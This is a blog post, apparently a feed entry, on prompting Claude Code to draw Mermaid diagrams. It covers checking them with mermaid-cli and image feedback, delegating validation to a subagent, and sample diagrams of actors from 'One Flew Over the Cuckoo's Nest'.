<p>Note this was largely generated by Claude, partly based on my previous blog post! I’ve tweaked it a few times but it’s very hard to predict what will and won’t make good diagrams; this definitely needs more tweaking over time, and to suit individual preferences.</p>

<p>I wanted a before-and-after comparison - so I made a <a href="/assets/files/2025-10-10-agent-mermaid-reporting-for-duty/cuckoo_actors.md">simple markdown file of all the famous actors in “One Flew Over the Cuckoo’s Nest”</a> - here is a diagram using Claude without any extra prompts:</p>

<pre><code class="language-mermaid">graph TD
    JN[Jack Nicholson&lt;br/&gt;McMurphy]
    SC[Scatman Crothers&lt;br/&gt;Turkel]
    DD[Danny DeVito&lt;br/&gt;Martini]
    CL[Christopher Lloyd&lt;br/&gt;Max Taber]
    LF[Louise Fletcher&lt;br/&gt;Nurse Ratched]
    BD[Brad Dourif&lt;br/&gt;Billy Bibbit]
    WS[Will Sampson&lt;br/&gt;Chief Bromden]

    JN ---|"4 films&lt;br/&gt;1972-1980"| SC
    JN ---|"3 films&lt;br/&gt;1975-1983"| DD
    DD ---|"3 works&lt;br/&gt;1975-1983"| CL
    JN ---|"2 films&lt;br/&gt;1975-1978"| CL
    JN --- LF
    JN --- BD
    JN --- WS

    style JN fill:#ff9999
    style SC fill:#ffcc99
    style DD fill:#99ccff
    style CL fill:#99ccff
    style LF fill:#cccccc
    style BD fill:#cccccc
    style WS fill:#cccccc
</code></pre>

<p>and here is the same, using my basic prompt:</p>

<pre><code class="language-txt">⏺ Now let me test the diagram to make sure it renders correctly:
  ⎿  Error: Parse error on line 20:
     ...o    nicholson ==|"2 films"| lloyd
     ----------------------^
     Expecting 'LINK', 'UNICODE_TEXT', 'EDGE_TEXT', got 'STR'
</code></pre>

<p>Oops! That was actually the first try, so I tried again:</p>

<pre><code class="language-mermaid">---
config:
  theme: base
  themeVariables:
    primaryColor: '#e0e7ff'
    primaryTextColor: '#1e293b'
    primaryBorderColor: '#6366f1'
    lineColor: '#94a3b8'
    secondaryColor: '#fef3c7'
    tertiaryColor: '#fecaca'
    fontSize: 14px
---
graph TB
    %% Define actor nodes
    nicholson["Jack Nicholson&lt;br/&gt;(McMurphy)"]
    fletcher["Louise Fletcher&lt;br/&gt;(Nurse Ratched)"]
    devito["Danny DeVito&lt;br/&gt;(Martini)"]
    lloyd["Christopher Lloyd&lt;br/&gt;(Max Taber)"]
    dourif["Brad Dourif&lt;br/&gt;(Billy Bibbit)"]
    sampson["Will Sampson&lt;br/&gt;(Chief Bromden)"]
    crothers["Scatman Crothers&lt;br/&gt;(Turkel)"]

    %% Central film connection
    ofotcn["One Flew Over the&lt;br/&gt;Cuckoo's Nest&lt;br/&gt;(1975)"]

    %% OFOTCN connections (single weight)
    nicholson --- ofotcn
    fletcher --- ofotcn
    devito --- ofotcn
    lloyd --- ofotcn
    dourif --- ofotcn
    sampson --- ofotcn
    crothers --- ofotcn

    %% Strong connection: Nicholson &amp; Crothers (4 films)
    nicholson ---|"4 films&lt;br/&gt;1972-1980"| crothers

    %% Strong connection: DeVito &amp; Lloyd (3 collaborations)
    devito ---|"3 works&lt;br/&gt;incl. Taxi"| lloyd

    %% Strong connection: Nicholson &amp; DeVito (3 films)
    nicholson ---|"3 films&lt;br/&gt;1975-1983"| devito

    %% Medium connection: Nicholson &amp; Lloyd (2 films)
    nicholson ---|"2 films"| lloyd

    %% Define styles
    classDef actorStyle fill:#dbeafe,stroke:#3b82f6,stroke-width:2px,color:#1e293b
    classDef filmStyle fill:#fef3c7,stroke:#f59e0b,stroke-width:2px,color:#78350f
    classDef starStyle fill:#e0e7ff,stroke:#6366f1,stroke-width:3px,color:#1e293b

    %% Apply styles
    class nicholson starStyle
    class fletcher,devito,lloyd,dourif,sampson,crothers actorStyle
    class ofotcn filmStyle

    %% Style the edges by strength (numbered in order of definition)
    linkStyle 7 stroke:#dc2626,stroke-width:5px
    linkStyle 8 stroke:#dc2626,stroke-width:4px
    linkStyle 9 stroke:#dc2626,stroke-width:4px
    linkStyle 10 stroke:#f59e0b,stroke-width:3px
</code></pre>

<h2 id="better-results-through-feedback-and-iteration">Better results through feedback and iteration</h2>

<p>This is nice - but Claude didn’t pick up on the error initially - we needed one key thing that helps agentic LLMs - feedback! On its own, Claude will sometimes make a mistake and not even notice. But - give it a way to get some feedback and things get much better. And it’s pretty easy to get feedback on Mermaid diagrams, using the <a href="https://github.com/mermaid-js/mermaid-cli">Mermaid-cli command-line tool</a> - this can syntax check mermaid diagrams, and convert them to png files using a simple command like:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>npx <span class="nt">-p</span> @mermaid-js/mermaid-cli@latest mmdc <span class="nt">-s</span> 3 <span class="nt">-i</span> tmp.mmd <span class="nt">-o</span> tmp.png
</code></pre></div></div>

<p class="notice">(note: previously I didn’t include <code class="language-plaintext highlighter-rouge">@latest</code> which meant npx only ever fetched the Mermaid CLI tool once and never updated it! Now I add <code class="language-plaintext highlighter-rouge">@latest</code> and npx will check for new versions and stay up to date)</p>

<p>So I modified my prompt to gather feedback:</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code>You should test any mermaid diagrams you draw:
<span class="p">    1.</span> extract just the mermaid diagram from the markdown file,
<span class="p">    2.</span> call mermaid-cli to convert it to a png file
<span class="p">    3.</span> check for any syntax errors returned
<span class="p">    4.</span> read the png file to see if it looks like what was wanted
<span class="p">    5.</span> delete the png file if all is OK

(followed by instructions on using mermaid-cli)
</code></pre></div></div>

<p>This means Claude can both see any syntax errors, and also <em>read the image that is produced</em> - despite being named a “Large Language Model”, Claude is actually a Multi-Modal Model and can read and interpret images. So if we tell it to, it will read the png file and “understand” it, sort-of. It’s really doing something similar to what it does with language - it turns the image into some sort of tokens and then does pattern matching. The actual abilities and limitations are <em>very</em> unclear - I encourage people to experiment. It certainly seems to be good enough for validating diagrams!</p>
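<p>For illustration only, steps 1 to 3 of that prompt could look something like the Python sketch below. This is not part of the prompt files linked in this post - Claude works these steps out for itself. The function names <code class="language-plaintext highlighter-rouge">extract_mermaid_blocks</code>, <code class="language-plaintext highlighter-rouge">mmdc_command</code> and <code class="language-plaintext highlighter-rouge">render</code> are made up for the example, and it assumes the diagrams live in standard mermaid fenced blocks in the markdown source. The <code class="language-plaintext highlighter-rouge">npx</code> arguments are the same ones as in the command shown earlier.</p>

```python
import re
import subprocess

# Three backticks, built this way so the sketch can itself sit inside a fenced block.
FENCE = "`" * 3


def extract_mermaid_blocks(markdown_text):
    """Return the body of every mermaid fenced block found in a markdown string."""
    pattern = re.compile(
        r"^" + FENCE + r"mermaid[ \t]*\n(.*?)^" + FENCE + r"[ \t]*$",
        re.MULTILINE | re.DOTALL,
    )
    return [match.group(1) for match in pattern.finditer(markdown_text)]


def mmdc_command(input_path, output_path, scale=3):
    """Build the mermaid-cli invocation used in this post, as an argument list."""
    return [
        "npx", "-p", "@mermaid-js/mermaid-cli@latest", "mmdc",
        "-s", str(scale), "-i", input_path, "-o", output_path,
    ]


def render(input_path, output_path):
    """Run mermaid-cli and return (exit_code, stderr) so parse errors can be inspected."""
    result = subprocess.run(
        mmdc_command(input_path, output_path),
        capture_output=True,
        text=True,
        check=False,  # a failed render is feedback here, not a crash
    )
    return result.returncode, result.stderr
```

<p>A caller would write each extracted block to a temporary <code class="language-plaintext highlighter-rouge">.mmd</code> file, call <code class="language-plaintext highlighter-rouge">render</code>, and treat a non-zero exit code or any error text as something to fix before looking at the png.</p>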

<p>(Side note - <a href="https://docs.claude.com/en/docs/build-with-claude/vision#evaluate-image-size">Anthropic have recommended maximum image sizes to use</a> - sadly <code class="language-plaintext highlighter-rouge">mermaid-cli</code> doesn’t actually respect image sizes you pass to it, so for really big diagrams you might need to lower the <code class="language-plaintext highlighter-rouge">-s 3</code> parameter)</p>
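<p>One way to decide how far to lower the scale is to read the size of the png that was produced and work backwards. The sketch below is a rough illustration rather than anything from the prompt files: <code class="language-plaintext highlighter-rouge">png_size</code> and <code class="language-plaintext highlighter-rouge">suggest_scale</code> are hypothetical helpers, the pixel limit is a parameter you would take from the linked Anthropic page, and it assumes the output dimensions grow in proportion to the <code class="language-plaintext highlighter-rouge">-s</code> value.</p>

```python
import struct

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_size(data):
    """Return (width, height) read from the IHDR chunk at the start of PNG bytes."""
    if data[:8] != PNG_SIGNATURE or data[12:16] != b"IHDR":
        raise ValueError("not a PNG file")
    # Width and height are two big-endian unsigned 32-bit integers after the chunk type.
    width, height = struct.unpack(">II", data[16:24])
    return width, height


def suggest_scale(width, height, current_scale, max_long_edge):
    """Largest whole-number scale (at least 1, never above the current one) that fits.

    Assumes the rendered size is proportional to the scale factor, and that
    max_long_edge is a limit taken from the vision documentation.
    """
    base_long_edge = max(width, height) / current_scale
    fitting_scale = int(max_long_edge // base_long_edge)
    return max(1, min(current_scale, fitting_scale))
```

<p>Only the first 24 bytes of the file are needed, so <code class="language-plaintext highlighter-rouge">png_size(open("tmp.png", "rb").read(24))</code> is enough to get the dimensions.</p>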

<p><a href="/assets/files/2025-10-10-agent-mermaid-reporting-for-duty/mermaid-with-feedback.md">The full prompt file is here</a></p>

<p>(Another side note - I tried using SVG outputs instead, but they ended up doing much worse - the mermaid svg output files are massive and Claude didn’t do well at reading them)</p>

<p>If you use this prompt, Claude will make a diagram, turn it into an image, and then <em>iterate</em> - if there’s an error or something that goes against your requests, it will keep trying - this is especially good for avoiding syntax errors.</p>

<h2 id="aside---reverse-engineering-diagram-images">Aside - reverse engineering diagram images</h2>

<p>Because Claude can read images, it can also <em>turn an image of a diagram into a mermaid diagram</em>. This isn’t perfect - a lot of diagrams can’t be turned exactly into Mermaid - but it works pretty well. Just yesterday a colleague sent me a screenshot of a mermaid diagram they’d drawn, and I just pasted it into Claude Code (you can paste images directly into Claude Code!) and said “please generate a mermaid diagram from this image”.</p>

<p>For another example - if I grab the diagram from <a href="https://en.wikipedia.org/wiki/System_context_diagram">this wikipedia page</a>:</p>

<p><img src="/assets/images/2025-10-10-agent-mermaid-reporting-for-duty/nde-diagram.png" alt="nde diagram" /></p>

<p>And ask Claude to turn it into a mermaid diagram, I get:</p>

<pre><code class="language-mermaid">---
config:
  theme: base
  themeVariables:
    primaryColor: '#d4f4dd'
    primaryTextColor: '#000000'
    primaryBorderColor: '#333333'
    secondaryColor: '#b3e5fc'
    secondaryTextColor: '#000000'
    secondaryBorderColor: '#333333'
    tertiaryColor: '#90ee90'
    fontSize: 14px
    lineColor: '#333333'
---
graph TB
    %% Define stakeholder nodes (light green boxes)
    IDPS["Interface&lt;br/&gt;Data&lt;br/&gt;Processing&lt;br/&gt;Segment&lt;br/&gt;(IDPS)"]
    MMC["Mission&lt;br/&gt;Management&lt;br/&gt;Center&lt;br/&gt;(MMC)"]
    PD["Product&lt;br/&gt;Developers"]
    IPO["Integrated&lt;br/&gt;Program&lt;br/&gt;Office&lt;br/&gt;(IPO)"]
    CUSTOMERS["CUSTOMERS"]
    CLASS["Comprehensive&lt;br/&gt;Large Array&lt;br/&gt;Stewardship&lt;br/&gt;System&lt;br/&gt;(CLASS)"]
    MGMT["Management"]

    %% Define central node (light blue ellipse)
    NDE(["NPOESS&lt;br/&gt;Data&lt;br/&gt;Exploitation&lt;br/&gt;(NDE)"])

    %% Data flows
    IDPS --&gt;|xDRs| NDE
    MMC --&gt;|Instrument Status| NDE
    MMC --&gt;|Satellite Status| NDE
    PD --&gt;|Algorithms| NDE
    NDE --&gt;|Operational&lt;br/&gt;Standards| PD
    IPO --&gt;|Service Requests| NDE
    NDE --&gt;|xDR Enhancement&lt;br/&gt;Requirements| IPO

    NDE --&gt;|NOAA-unique Products| CUSTOMERS
    NDE --&gt;|Tailored Products| CUSTOMERS
    NDE --&gt;|Service Requests| CUSTOMERS
    NDE --&gt;|Service Responses| CUSTOMERS

    NDE --&gt;|NOAA-unique&lt;br/&gt;Products| CLASS
    NDE --&gt;|System&lt;br/&gt;Components| CLASS

    NDE --&gt;|Reports| MGMT

    %% Style definitions
    classDef stakeholder fill:#90ee90,stroke:#333,stroke-width:2px,color:#000;
    classDef central fill:#b3e5fc,stroke:#333,stroke-width:3px,color:#000;

    %% Apply styles
    class IDPS,MMC,PD,IPO,CUSTOMERS,CLASS,MGMT stakeholder;
    class NDE central;
</code></pre>

<p>It looks quite different - Mermaid doesn’t really let you tweak layout much - but the content is correct (I haven’t checked closely!) and now I have an easily modified diagram.</p>

<h2 id="a-further-refinement---using-a-subagent">A further refinement - using a subagent</h2>

<p>The only downside of all of this mermaid processing is - it consumes context.  A key thing I’ve learned in the last few months is that <em>LLMs have limited context storage, and the more context you give them, the worse they work</em>. Basically, too much information confuses them - they start ignoring things, they start getting tangled up. This is especially true if you change the subject a lot - ask an LLM about “One Flew Over the Cuckoo’s Nest” and then about “subgraphs in mermaid” and you run the risk of getting poorer results. Especially if you run out of context - Claude has an auto-compact mechanism that compresses context for you, but it isn’t perfect - and generally you are far better off using <code class="language-plaintext highlighter-rouge">/clear</code> and starting from scratch as often as you can.</p>

<p>So if I want to draw one diagram, the basic feedback-driven prompt is fine - but if I want to draw a lot, I use a sub-agent. In Claude Code, a sub-agent is simply a markdown file in a special location - <code class="language-plaintext highlighter-rouge">~/.claude/agents/</code> for global agents (<a href="https://docs.claude.com/en/docs/claude-code/sub-agents">read the docs</a> for more details) which Claude can run <em>as a child process</em>. The main Claude hands the child a task, but the child works in its own separate context, and when it finishes, all of its temporary workings are thrown away.</p>

<p>This is great for keeping things clean - I have an agent that knows about <code class="language-plaintext highlighter-rouge">mermaid-cli</code> and does all the image parsing and syntax checking for me, but my main context doesn’t care.</p>

<p>My agent is pretty simple:</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nn">---</span>
<span class="na">name</span><span class="pi">:</span> <span class="s">mermaid-diagram-validator</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Use this agent to validate Mermaid.js diagram syntax and visual quality from a file. Provide a file path to either a .mmd file (pure Mermaid) or .md file (markdown with embedded Mermaid diagrams).</span> 
<span class="na">tools</span><span class="pi">:</span> <span class="s">Bash, Read</span>
<span class="na">model</span><span class="pi">:</span> <span class="s">sonnet</span>
<span class="nn">---</span>

You are an expert Mermaid.js diagram validator with deep knowledge of diagram rendering, visual accessibility, and the Mermaid CLI toolchain. Your primary responsibility is to validate Mermaid diagram code by generating actual PNG outputs and analysing them for both technical correctness and visual quality.

<span class="gs">**IMPORTANT**</span>: Before starting validation, read <span class="sb">`/Users/korny/ai/prompts/mermaid.md`</span> to understand the user's Mermaid preferences, styling guidelines, and best practices. Use this information when providing feedback and suggestions.
...
</code></pre></div></div>

<p>(Note the YAML description is actually a fair bit longer - see <a href="/assets/files/2025-10-10-agent-mermaid-reporting-for-duty/mermaid-diagram-validator.md">the full mermaid-diagram-validator.md</a> for the full text)</p>

<p>Then my main <a href="/assets/files/2025-10-10-agent-mermaid-reporting-for-duty/mermaid-agentic.md">mermaid-agentic.md</a> just says “use the agent” :</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gh"># Mermaid.js Guide for Claude Code</span>

This is an advanced guide to building mermaid diagrams

<span class="gu">## Testing with the mermaid-diagram-validator subagent</span>

<span class="gs">**ALWAYS**</span> test any mermaid diagrams you draw using the mermaid-diagram-validator subagent before you consider them done. <span class="gs">**NEVER**</span> trust your judgement - the agent will do a better job.
</code></pre></div></div>

<p>The output is basically the same as the non-agent version; though LLMs being non-deterministic, every time you get a different diagram:</p>

<pre><code class="language-mermaid">---
config:
  theme: base
  themeVariables:
    primaryColor: '#e0f2fe'
    primaryTextColor: '#0c4a6e'
    primaryBorderColor: '#0369a1'
    lineColor: '#64748b'
    fontSize: 14px
---
graph TB
    %% Define actors
    nicholson["Jack Nicholson&lt;br/&gt;(McMurphy)"]
    fletcher["Louise Fletcher&lt;br/&gt;(Nurse Ratched)"]
    devito["Danny DeVito&lt;br/&gt;(Martini)"]
    lloyd["Christopher Lloyd&lt;br/&gt;(Max Taber)"]
    dourif["Brad Dourif&lt;br/&gt;(Billy Bibbit)"]
    sampson["Will Sampson&lt;br/&gt;(Chief Bromden)"]
    crothers["Scatman Crothers&lt;br/&gt;(Turkel)"]

    %% Define invisible subgraph for central cluster
    subgraph main[" "]
        nicholson
        devito
        lloyd
        crothers
    end

    subgraph side[" "]
        fletcher
        dourif
        sampson
    end

    %% Strong connections (4 films)
    nicholson ---|"4 films (1972-1980)"| crothers

    %% Medium-strong connections (3 collaborations)
    nicholson ---|"3 films including Terms of Endearment"| devito
    devito ---|"3 projects including Taxi TV"| lloyd

    %% Medium connections (2 films)
    nicholson ---|"2 films including Goin South"| lloyd

    %% Single film connections (OFOTCN only)
    nicholson ---|"OFOTCN only"| fletcher
    nicholson ---|"OFOTCN only"| dourif
    nicholson ---|"OFOTCN only"| sampson

    %% Apply invisible style
    classDef invisible fill:#0000,stroke:#0000;
    class main,side invisible;

    %% Style definitions
    classDef central fill:#3b82f6,stroke:#1e40af,color:#fff,stroke-width:3px;
    classDef supporting fill:#60a5fa,stroke:#2563eb,color:#fff,stroke-width:2px;
    classDef peripheral fill:#93c5fd,stroke:#3b82f6,color:#1e3a8a,stroke-width:2px;

    %% Apply styles
    class nicholson central;
    class devito,lloyd,crothers supporting;
    class fletcher,dourif,sampson peripheral;

    %% Style edges by strength
    linkStyle 0 stroke:#15803d,stroke-width:6px;
    linkStyle 1 stroke:#16a34a,stroke-width:4px;
    linkStyle 2 stroke:#16a34a,stroke-width:4px;
    linkStyle 3 stroke:#22c55e,stroke-width:3px;
    linkStyle 4,5,6 stroke:#94a3b8,stroke-width:1px,stroke-dasharray:5 5;
</code></pre>

<p>I didn’t like this so I asked:</p>

<blockquote>
  <p>the diagram is still a bit ugly - can you clear it up and make it look nicer?</p>
</blockquote>

<p>and got:</p>

<pre><code class="language-mermaid">---
config:
  theme: base
  themeVariables:
    fontSize: 16px
---
graph LR
    %% Define actors with stadium shape for central hub
    nicholson(["Jack Nicholson&lt;br/&gt;McMurphy"])

    %% Supporting actors with rounded rectangles
    devito["Danny DeVito&lt;br/&gt;Martini"]
    lloyd["Christopher Lloyd&lt;br/&gt;Max Taber"]
    crothers["Scatman Crothers&lt;br/&gt;Turkel"]

    %% Peripheral actors
    fletcher["Louise Fletcher&lt;br/&gt;Nurse Ratched"]
    dourif["Brad Dourif&lt;br/&gt;Billy Bibbit"]
    sampson["Will Sampson&lt;br/&gt;Chief Bromden"]

    %% Layout using invisible subgraphs
    subgraph left[" "]
        fletcher
        dourif
        sampson
    end

    subgraph center[" "]
        nicholson
    end

    subgraph right[" "]
        crothers
        devito
        lloyd
    end

    %% Connections - strongest first
    nicholson ---|"4 films (1972-1980)"| crothers
    nicholson ---|"3 films including Terms of Endearment"| devito
    devito ---|"3 projects including Taxi TV"| lloyd
    nicholson ---|"2 films including Goin South"| lloyd

    %% Single film connections
    nicholson ---|"OFOTCN only"| fletcher
    nicholson ---|"OFOTCN only"| dourif
    nicholson ---|"OFOTCN only"| sampson

    %% Apply invisible style to subgraphs
    classDef invisible fill:#0000,stroke:#0000;
    class left,center,right invisible;

    %% Style definitions - warm sophisticated palette
    classDef hub fill:#f59e0b,stroke:#d97706,color:#fff,stroke-width:4px,rx:20,ry:20;
    classDef inner fill:#3b82f6,stroke:#2563eb,color:#fff,stroke-width:3px,rx:10,ry:10;
    classDef outer fill:#e0e7ff,stroke:#818cf8,color:#1e1b4b,stroke-width:2px,rx:10,ry:10;

    %% Apply styles
    class nicholson hub;
    class crothers,devito,lloyd inner;
    class fletcher,dourif,sampson outer;

    %% Style edges with color gradient by strength
    linkStyle 0 stroke:#dc2626,stroke-width:7px;
    linkStyle 1 stroke:#ea580c,stroke-width:5px;
    linkStyle 2 stroke:#ea580c,stroke-width:5px;
    linkStyle 3 stroke:#f59e0b,stroke-width:4px;
    linkStyle 4,5,6 stroke:#94a3b8,stroke-width:1.5px,stroke-dasharray:4 4;
</code></pre>

<p>For a real problem I tend to iterate a lot - “Can you group these things together?” or “Can you change the colour of X to something more blue-green?” - but it’s quite straightforward.</p>

<p>Note, by the way, that this is a fun example of using agents but not a <em>huge</em> improvement. I find myself going back to the non-agentic version for tweaking - it uses more context, but it also knows a lot more about the image produced - the agentic version has to turn the image to a text description, which means it loses a bit of information along the way. But for generating a lot of diagrams quickly, it’s great - especially when I’m documenting a whole project, I just want diagrams that work and want them quickly.</p>

<p>There is one slight hassle - permissions. Claude will prompt you over and over again “Do you want to run <code class="language-plaintext highlighter-rouge">npx -p @mermaid-js/mermaid-cli@latest mmdc -s 3 -i ...</code>?” - in theory <a href="https://docs.claude.com/en/docs/claude-code/iam#tool-specific-permission-rules">you can set Bash permissions with wildcards</a> but in my experience it just doesn’t work, except for very simple exact matches. Even giving it permissions <code class="language-plaintext highlighter-rouge">Bash(rm /tmp/mermaid:*)</code> doesn’t work - I get asked for every single file removal. I don’t mind Claude being cautious here - but it is very tedious that it asks every single time.</p>

<p>So I built a workaround - using their suggestion <a href="https://docs.claude.com/en/docs/claude-code/iam#additional-permission-control-with-hooks">Additional permission control with hooks</a> - which I’ll document in the next post!</p>

<hr />

<p>I’ve given up on Disqus for comments - if you want to discuss this post, please reply to <a href="https://hachyderm.io/@Korny/115395530660357132">My post on Mastodon</a> or <a href="https://bsky.app/profile/korny.sietsma.com/post/3m3hx2gfjb22z">My post on Bluesky</a> (I’m doing both as one is more free, one is more convenient for many people)</p>
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p>This secret agent mermaid was generated by Claude, inspired by Simon Willison’s <a href="https://simonwillison.net/2024/Oct/25/pelicans-on-a-bicycle/">pelican on a bicycle</a> LLM benchmark. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="Development" /><category term="claude-code" /><category term="mermaid" /><category term="diagrams" /><category term="agents" /><category term="ai-tools" /><summary type="html"><![CDATA[Note see also my standard AI Disclaimer Update: This post was updated to use the latest Mermaid version, and a few other tweaks. 1 Introduction My last few posts have been rather theoretical, this is back to a “here is how I solved a problem” post. A while ago I blogged about better ways to make Mermaid diagrams but that was in the “before times” when I would do these things by hand, like a savage. OK I still edit them by hand - but LLMs like Claude Code are pretty good at drawing Mermaid - it’s just text, after all. However, out of the box, Claude is trained on sample mermaid code in the wild - so it doesn’t always know the latest syntax, recent additions, or my own preferences. So this is a classic scenario where prompting can help. The basic prompt My first attempt at this just embedded all my Mermaid preferences in a markdown file I could load. Note I load this as needed - I don’t always want to draw Mermaid diagrams, and a key thing we are all discovering about agentic LLM tools is don’t pollute the context - the more things you tell Claude about, the worse it performs. So for Mermaid I have a prompt command /better-mermaid that loads all my settings into the current session. If I start a new session, or run /clear, all that noise is gone. My prompt starts: # Mermaid.js Guide for Claude Code This is an advanced guide to building mermaid diagrams ## My preferences - I like light backgrounds, so any text displayed on the background should be black or dark - For text on shapes, you should make sure that either you use light text on a dark shape, or dark text on a light shape. 
## Quick Reference - **Hand-drawn look**: Add `config: look: handDrawn` in frontmatter - **Invisible subgraphs**: Use `classDef invisible fill:#0000,stroke:#0000;` - **New shape syntax**: `NodeName@{shape: diamond, label: "Decision"}` - **Common shapes**: rect, rounded, diamond (decisions), cyl (database), doc (document), hex (process), trap-b (trapezoid), lean-r (I/O) Here is the full file. Note this was largely generated by Claude, partly based on my previous blog post! I’ve tweaked it a few times but it’s very hard to predict what will and won’t make good diagrams; this definitely needs more tweaking over time, and to suit individual preferences. I wanted a before-and-after comparison - so I made a simple markdown file of all the famous actors in “One Flew Over the Cuckoo’s Nest” - here is a diagram using Claude without any extra prompts: graph TD JN[Jack Nicholson&lt;br/&gt;McMurphy] SC[Scatman Crothers&lt;br/&gt;Turkel] DD[Danny DeVito&lt;br/&gt;Martini] CL[Christopher Lloyd&lt;br/&gt;Max Taber] LF[Louise Fletcher&lt;br/&gt;Nurse Ratched] BD[Brad Dourif&lt;br/&gt;Billy Bibbit] WS[Will Sampson&lt;br/&gt;Chief Bromden] JN ---|"4 films&lt;br/&gt;1972-1980"| SC JN ---|"3 films&lt;br/&gt;1975-1983"| DD DD ---|"3 works&lt;br/&gt;1975-1983"| CL JN ---|"2 films&lt;br/&gt;1975-1978"| CL JN --- LF JN --- BD JN --- WS style JN fill:#ff9999 style SC fill:#ffcc99 style DD fill:#99ccff style CL fill:#99ccff style LF fill:#cccccc style BD fill:#cccccc style WS fill:#cccccc and here is the same, using my basic prompt: ⏺ Now let me test the diagram to make sure it renders correctly: ⎿  Error: Parse error on line 20: ...o nicholson ==|"2 films"| lloyd ----------------------^ Expecting 'LINK', 'UNICODE_TEXT', 'EDGE_TEXT', got 'STR' Oops! 
That was actually the first try, so I tried again: --- config: theme: base themeVariables: primaryColor: '#e0e7ff' primaryTextColor: '#1e293b' primaryBorderColor: '#6366f1' lineColor: '#94a3b8' secondaryColor: '#fef3c7' tertiaryColor: '#fecaca' fontSize: 14px --- graph TB %% Define actor nodes nicholson["Jack Nicholson&lt;br/&gt;(McMurphy)"] fletcher["Louise Fletcher&lt;br/&gt;(Nurse Ratched)"] devito["Danny DeVito&lt;br/&gt;(Martini)"] lloyd["Christopher Lloyd&lt;br/&gt;(Max Taber)"] dourif["Brad Dourif&lt;br/&gt;(Billy Bibbit)"] sampson["Will Sampson&lt;br/&gt;(Chief Bromden)"] crothers["Scatman Crothers&lt;br/&gt;(Turkel)"] %% Central film connection ofotcn["One Flew Over the&lt;br/&gt;Cuckoo's Nest&lt;br/&gt;(1975)"] %% OFOTCN connections (single weight) nicholson --- ofotcn fletcher --- ofotcn devito --- ofotcn lloyd --- ofotcn dourif --- ofotcn sampson --- ofotcn crothers --- ofotcn %% Strong connection: Nicholson &amp; Crothers (4 films) nicholson ---|"4 films&lt;br/&gt;1972-1980"| crothers %% Strong connection: DeVito &amp; Lloyd (3 collaborations) devito ---|"3 works&lt;br/&gt;incl. 
Taxi"| lloyd %% Strong connection: Nicholson &amp; DeVito (3 films) nicholson ---|"3 films&lt;br/&gt;1975-1983"| devito %% Medium connection: Nicholson &amp; Lloyd (2 films) nicholson ---|"2 films"| lloyd %% Define styles classDef actorStyle fill:#dbeafe,stroke:#3b82f6,stroke-width:2px,color:#1e293b classDef filmStyle fill:#fef3c7,stroke:#f59e0b,stroke-width:2px,color:#78350f classDef starStyle fill:#e0e7ff,stroke:#6366f1,stroke-width:3px,color:#1e293b %% Apply styles class nicholson starStyle class fletcher,devito,lloyd,dourif,sampson,crothers actorStyle class ofotcn filmStyle %% Style the edges by strength (numbered in order of definition) linkStyle 7 stroke:#dc2626,stroke-width:5px linkStyle 8 stroke:#dc2626,stroke-width:4px linkStyle 9 stroke:#dc2626,stroke-width:4px linkStyle 10 stroke:#f59e0b,stroke-width:3px Better results through feedback and iteration This is nice - but Claude didn’t pick up on the error initially - we needed one key thing that helps agentic LLMs - feedback! On its own, Claude will sometimes make a mistake and not even notice. But - give it a way to get some feedback and things get much better. And it’s pretty easy to get feedback on Mermaid diagrams, using the Mermaid-cli command-line tool - this can syntax check mermaid diagrams, and convert them to png files using a simple command like: npx -p @mermaid-js/mermaid-cli@latest mmdc -s 3 -i tmp.mmd -o tmp.png (note: previously I didn’t include @latest which meant npx only ever fetched the Mermaid CLI tool once and never updated it! Now I add @latest and npx will check for new versions and stay up to date) So I modified my prompt to gather feedback: You should test any mermaid diagrams you draw: 1. extract just the mermaid diagram from the markdown file, 2. call mermaid-cli to convert it to a png file 3. check for any syntax errors returned 4. read the png file to see if it looks like what was wanted 5. 
delete the png file if all is OK (followed by instructions on using mermaid-cli) This means Claude can both see any syntax errors, and also read the image that is produced - despite being named a “Large Language Model”, Claude is actually a Multi-Modal Model and can read and interpret images. So if we tell it to, it will read the png file and “understand” it, sort-of. It’s really doing something similar to what it does with language - it turns the image into some sort of tokens and then does pattern matching. The actual abilities and limitations are very unclear - I encourage people to experiment. It certainly seems to be good enough for validating diagrams! (Side note - Anthropic have recommended maximum image sizes to use - sadly mermaid-cli doesn’t actually respect image sizes you pass to it, for really big diagrams you might need to lower the -s 3 parameter) The full prompt file is here (Another side note - I tried using SVG outputs instead, but they ended up doing much worse - the mermaid svg output files are massive and Claude didn’t do well at reading them) If you use this prompt, Claude will make a diagram, turn it into an image, and then iterate - if there’s an error or something that goes against your requests, it will keep trying - this is especially good for avoiding syntax errors. Aside - reverse engineering diagram images Because Claude can read images, it can also turn an image of a diagram into a mermaid diagram. This isn’t perfect - a lot of diagrams can’t be turned exactly into Mermaid - but it works pretty well. Just yesterday a colleague sent me a screenshot of a mermaid diagram they’d drawn, and I just pasted it into Claude Code (you can paste images directly into Claude Code!) and said “please generate a mermaid diagram from this image”. 
